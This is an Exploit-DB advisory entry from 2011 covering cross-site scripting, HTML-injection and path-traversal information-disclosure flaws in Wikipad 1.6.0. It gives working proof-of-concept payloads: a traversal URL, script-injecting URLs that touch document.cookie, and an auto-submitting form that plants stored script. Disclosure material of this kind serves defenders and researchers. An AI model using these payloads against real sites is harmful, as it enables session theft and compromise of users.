Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure

EDB-ID:

35350

CVE:

N/A

EDB Verified:

Author:

High-Tech Bridge SA

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-02-15

Vulnerable App:

source: https://www.securityfocus.com/bid/46383/info

Wikipad is prone to a cross-site scripting vulnerability, an HTML-injection vulnerability, and an information-disclosure vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.

Wikipad 1.6.0 is vulnerable; other versions may also be affected. 

Information-disclosure:

http://www.example.com/pages.php?id=./../../../../../txt_file

Cross-site scripting:

http://www.example.com/pages.php?id=index"><script>alert(document.cookie)</script>
http://www.example.com/pages.php?action=edit&id=27-01-2011"><script>alert(document.cookie)</script>

HTML-injection:

<form action="http://host/pages.php?action=edit&id=index&title=index" method="post" name="main">
<input type="hidden" name="data[text]" value=&#039;text"><script>alert(document.cookie)</script>&#039;>
</form>

<script>
document.main.submit();
</script>

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services